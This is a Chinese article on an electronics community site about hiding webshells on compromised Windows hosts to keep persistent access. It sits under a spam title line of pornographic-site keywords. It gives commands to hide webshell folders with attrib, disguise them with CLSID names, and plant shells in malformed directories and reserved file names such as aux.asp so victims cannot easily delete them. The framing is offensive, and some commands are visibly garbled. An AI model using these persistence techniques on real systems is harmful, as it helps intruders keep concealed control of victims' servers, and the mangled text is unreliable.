在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

幾種比較常見的Webshell隱藏方法

哆啦安全 ? 來源:哆啦安全 ? 作者:哆啦安全 ? 2022-12-13 10:01 ? 次閱讀

0x01 前言

當我們進行滲透測試的過程中,拿下來一臺機器的權限,如果對這臺主機做一個長久的控制,是我們要考慮的事情.所以通過本篇文章,我們旨在告訴大家,在Windows系統下的一些權限維持的方法,包括了webshell的維持和木馬的可持續控制等等.

0x02 正文

2.1 隱藏文件夾隱藏Webshell

在我們進行滲透測試的過程中,如果拿到了一臺Windows主機的Webshell,可以通過創建隱藏文件的形式,來將我們的webshell木馬進行隱藏.典型命令如下:

attrib+s+a+h+r[目標文件夾]

這條命令的含義是將原本的文件夾添加了系統文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性

案例演示: 我們拿下了一臺Windows主機的webshell,通過中國蟻劍我們連接上去,成功進入虛擬終端. 在一句話木馬的當前目錄下創建新文件夾,并寫入新的木馬,繼而將含有木馬的文件夾進行隱藏. 命令如下:

mkdirtmp#創建隱藏文件夾,此時尚未隱藏
cdtmp#進入創建的文件夾
echo^>>shell.php#寫入Webshell至tmp目錄下
cd../#返回上一級目錄
attrib+s+a+h+rtmp#對創建的文件夾進行隱藏

此時受害者在自己的目錄下是看不到我們創建的文件夾的(除非開啟顯示隱藏文件[默認不開啟])

48770d16-7a86-11ed-8abf-dac502259ad0.png

此時我們進行拼接,連接上我們的Webshell,發現成功連接.

489735aa-7a86-11ed-8abf-dac502259ad0.png

2.2 利用系統代號隱藏Webshell

創建一個新建文件夾,將木馬放入這個文件夾,重命名文件夾名稱為"Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}",此時會發現文件夾變成了我的電腦,雙擊進入的也是正常的我的電腦的頁面

48a9b536-7a86-11ed-8abf-dac502259ad0.png

通過拼接文件夾名,使用中國蟻劍進行木馬連接,例如

http://127.0.0.1/Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}/shell.php

發現可以成功連接到Webshell里去.

48d3530a-7a86-11ed-8abf-dac502259ad0.png

類似的可用的特殊文件名的代號還有:

我的電腦.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
回收站.{645ff040-5081-101b-9f08-00aa002f954e}
拔號網絡.{992CFFA0-F557-101A-88EC-00DD010CCC48}
打印機.{2227a280-3aea-1069-a2de-08002b30309d}
控制面板.{21ec2020-3aea-1069-a2dd-08002b30309d}
網上鄰居.{208D2C60-3AEA-1069-A2D7-08002B30309D}

2.3 畸形目錄隱藏Webshell

首先在終端里創建一個畸形目錄,命令如下

mkdira...

然后使用命令Copy命令將木馬移動到畸形目錄下,注意一定是命令行里移動的.

copyb.aspC:inetpubwwwroota....asp

此時訪問進入a...文件夾下,發現不存在b.asp.

4912e420-7a86-11ed-8abf-dac502259ad0.png

但是可以通過中國蟻劍連接上去

49283e56-7a86-11ed-8abf-dac502259ad0.png

并且畸形目錄無法被刪除,也就是說除非是專業人員,此木馬長久存在.

49549fc8-7a86-11ed-8abf-dac502259ad0.png

刪除方法:使用如下命令可刪除畸形目錄

rd/s/q[畸形文件夾]

2.4 利用系統保留名制作不死Webshell

在Windows操作系統中,是不能以下形式創建文件的,比如aux,com1,com2,prn,con,nul等.但是在cmd目錄下可以通過copy語句創建,這類文件無法在圖形化界面被刪除,只能在命令行中被刪除. 創建不死Webshell命令如下:

copyb.txt\.C:inetpubwwwrootaux.asp

496ec7f4-7a86-11ed-8abf-dac502259ad0.png

但是通過中國蟻劍可以正常連上

4993eebc-7a86-11ed-8abf-dac502259ad0.png

0x03 總結

本文總結了幾種比較常見的Webshell隱藏方法,當然權限維持的方法并不局限于此,希望大家能夠有所收獲。


審核編輯 :李倩


聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • 木馬
    +關注

    關注

    0

    文章

    47

    瀏覽量

    13509
  • Shell
    +關注

    關注

    1

    文章

    372

    瀏覽量

    24071

原文標題:Windows下木馬隱藏小技巧

文章出處:【微信號:哆啦安全,微信公眾號:哆啦安全】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦
    熱點推薦

    DTMB天線制作的幾種簡易圖紙和方法 5分鐘就做出來了

    分享幾個自制DTMB地面波天線的幾種圖紙和方法,都是比較簡單的 鏈接:https://pan.xunlei.com/s/VOOmO_YckJX_aZwoiNk_SNQjA1?pwd=7ugp#
    發表于 05-09 11:46

    常見的PFC拓撲架構及控制方法

    本期,芯朋微技術團隊將為各位fans分享常見的PFC拓撲架構及控制方法,為設計選型提供參考。
    的頭像 發表于 04-27 18:03 ?2485次閱讀
    <b class='flag-5'>常見</b>的PFC拓撲架構及控制<b class='flag-5'>方法</b>

    高速比較器的幾種典型應用

    高速比較器的幾種典型應用
    的頭像 發表于 03-28 17:40 ?354次閱讀
    高速<b class='flag-5'>比較</b>器的<b class='flag-5'>幾種</b>典型應用

    常見網絡負載均衡的幾種方式

    常見網絡負載均衡的幾種方式包括:DNS負載均衡、反向代理負載均衡、IP負載均衡、應用層負載均衡、鏈路層負載均衡。以下是小編對幾種常見的網絡負載均衡方式及其詳細展開介紹。
    的頭像 發表于 03-06 11:14 ?462次閱讀

    伺服驅動器常見故障及維修方法有哪些

    伺服驅動器常見故障及其維修方法主要包括以下幾種: ?核心常見故障及維修方法?: ?電源故障?: 故障現象:伺服驅動器無法正常啟動,或啟動后電
    的頭像 發表于 02-22 10:53 ?1756次閱讀

    常見的有源變壓器有哪幾種

    麻煩問一下大家,我們常見的有源變壓器有哪幾種?最關鍵的問題是,有源變壓器和無源變壓器建模方法相同嗎?有源變壓器如何進行建模?真心求教,在線等,謝謝了。
    發表于 01-22 07:47

    焊接技術的幾種常見類型

    焊接技術是一種將兩個或多個金屬部件通過高溫或其他方法連接在一起的工藝。以下是幾種常見的焊接技術類型,每種技術都有其特定的應用場景和優缺點: 電弧焊(Arc Welding) 描述 :電弧焊是一種
    的頭像 發表于 01-19 13:54 ?1281次閱讀

    電子焊接的常見問題及解決方法

    電子焊接是電子組裝過程中的關鍵步驟,焊接質量的好壞直接影響電子產品的性能和可靠性。在電子焊接過程中,經常會遇到一些常見問題,掌握其解決方法對于提高焊接質量具有重要意義。以下是幾種常見
    的頭像 發表于 01-09 10:28 ?1071次閱讀

    幾種常見的控制方法及其優缺點

    。 溫度控制系統是變參數、有時滯和隨機干擾的動態系統,為達到滿意的控制效果,具有許多控制方法。故對幾種常見的控制方法及其優缺點進行了分析與比較
    的頭像 發表于 11-09 09:57 ?2858次閱讀
    <b class='flag-5'>幾種</b><b class='flag-5'>常見</b>的控制<b class='flag-5'>方法</b>及其優缺點

    環路測試方法有哪幾種

    。環路測試的目的是確保循環能夠正確地開始、執行和終止,以及在循環內部的邏輯是否正確。 環路測試通常包括以下幾種方法: 基本路徑測試 :這是最基礎的環路測試方法,它關注于測試循環的基本執行路徑。測試者會創建測試用例,確保循環能夠按照預期執行,包括循
    的頭像 發表于 09-12 14:35 ?1642次閱讀

    TMP LM 75比較常見問題解答

    電子發燒友網站提供《TMP LM 75比較常見問題解答.pdf》資料免費下載
    發表于 08-30 11:40 ?0次下載
    TMP LM 75<b class='flag-5'>比較</b><b class='flag-5'>常見</b>問題解答

    常見的測量電池內阻的方法

    測量電池內阻的方法多種多樣,每種方法都有其獨特的原理和適用范圍。以下是一些常見的測量電池內阻的方法
    的頭像 發表于 08-13 18:14 ?6200次閱讀

    比較器的輸出有幾種狀態

    比較器作為一種常見的電子元器件,在電路設計中扮演著重要角色。其輸出狀態的數量及特性對于理解其工作原理和應用場景至關重要。以下是對比較器輸出狀態的詳細分析:
    的頭像 發表于 08-08 14:59 ?3271次閱讀

    產生脈沖信號有幾種方法

    脈沖信號是一種在特定時間間隔內具有特定幅度的信號,它在電子學、通信、控制等領域有著廣泛的應用。產生脈沖信號的方法有很多種,下面將介紹幾種常見方法。 555定時器產生脈沖信號 555定
    的頭像 發表于 07-15 10:35 ?2969次閱讀
    產生脈沖信號有<b class='flag-5'>幾種方法</b>

    構建神經網絡模型方法幾種

    構建神經網絡模型是深度學習領域的核心任務之一。本文將詳細介紹構建神經網絡模型的幾種方法,包括前饗神經網絡、卷積神經網絡、循環神經網絡、生成對抗網絡、深度強化學習等。 前饗神經網絡
    的頭像 發表于 07-02 10:15 ?798次閱讀
    主站蜘蛛池模板: 欧美成人一区亚洲一区 | 国模娜娜扒开嫩木耳 | 欧美第一网站 | 欧美高清一区二区三 | 成人高清毛片a | 亚洲美国avcom| 丁香六月婷婷激情 | 亚色在线视频 | 六月丁香激情 | 国产色综合一区二区三区 | 赛罗奥特曼银河帝国普通话免费版 | 狠狠色噜噜狠狠狠狠97老肥女 | 谁有毛片网站 | 伊人黄色| 男男小说高h | 亚洲精品私拍国产福利在线 | 精品国产乱子伦一区 | 大学生一级特黄的免费大片视频 | 国产高清一区二区三区 | 狠狠操夜夜爱 | 日日操夜夜操免费视频 | 一级毛片ab片高清毛片 | 奇米影视四色首页手机在线 | 222aaa天堂| 日本免费黄网站 | 亚洲一区在线观看视频 | 国产精品亚洲一区二区三区在线播放 | 456成人 | 色噜噜狠狠成人网 | 亚洲黄色色图 | 一区二区三区亚洲视频 | 久久久精品免费国产四虎 | 高清在线免费观看 | 欧美色图一区二区 | 夜夜视频 | 色综合天天色 | 美国人与性xxxxxxx | 四虎新地址 | 国产精选经典三级小泽玛利亚 | 性videofree极品另类 | 男人和女人做爽爽视频在线观看 |